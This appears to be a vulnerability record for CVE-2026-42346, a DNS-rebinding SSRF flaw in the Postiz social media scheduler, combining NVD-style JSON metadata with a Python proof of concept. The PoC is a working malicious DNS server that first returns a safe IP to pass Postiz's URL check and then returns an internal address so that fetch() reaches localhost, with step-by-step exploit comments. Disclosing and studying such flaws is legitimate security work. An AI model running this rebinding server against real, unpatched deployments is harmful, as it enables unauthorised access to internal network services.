CVE-2026-42346

# PoC: DNS Rebinding Server for CVE-2026-42346 # This script simulates a malicious DNS server to exploit the TOCTOU race condition. from dnslib import DNSRecord, DNSHeader, RR, A, QTYPE import socket class DNSRebindServer: def __init__(self, safe_ip, internal_ip): self.safe_ip = safe_ip self.internal_ip = internal_ip self.query_count = {} def handle(self, data): request = DNSRecord.parse(data) qname = str(request.q.qname) qtype = request.q.qtype if qname not in self.query_count: self.query_count[qname] = 0 reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q) if qtype == QTYPE.A: # First query returns Safe IP to bypass isSafePublicHttpsUrl() # Subsequent queries return Internal IP for fetch() if self.query_count[qname] == 0: ip = self.safe_ip else: ip = self.internal_ip self.query_count[qname] += 1 reply.add_answer(RR(qname, QTYPE.A, rdata=A(ip), ttl=0)) return reply.pack() # Exploit Logic: # 1. Attacker runs this DNS server. # 2. Attacker sends URL http://attacker-controlled-domain.com to Postiz. # 3. Postiz calls isSafePublicHttpsUrl() -> DNS returns 1.1.1.1 (Safe) -> Check passes. # 4. Postiz calls fetch() -> DNS returns 127.0.0.1 (Internal) -> SSRF occurs.

{"cve": {"id": "CVE-2026-42346", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:37.903", "lastModified": "2026-05-08T23:16:37.903", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Postiz is an AI social media scheduling tool. From version 2.16.6 to before version 2.21.7, all SSRF protections added in v2.21.4–v2.21.6 share a fundamental TOCTOU (Time-of-Check-Time-of-Use) vulnerability: isSafePublicHttpsUrl() resolves DNS to validate the target IP, but subsequent fetch() calls resolve DNS independently. An attacker controlling a DNS server can exploit this gap via DNS rebinding to redirect requests to internal network addresses. This issue has been patched in version 2.21.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/gitroomhq/postiz-app/commit/071143dcb01cdeb9d5d7019892f4c6ff7b19dbeb", "source": "[email protected]"}, {"url": "https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7", "source": "[email protected]"}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-f7jj-p389-4w45", "source": "[email protected]"}]}}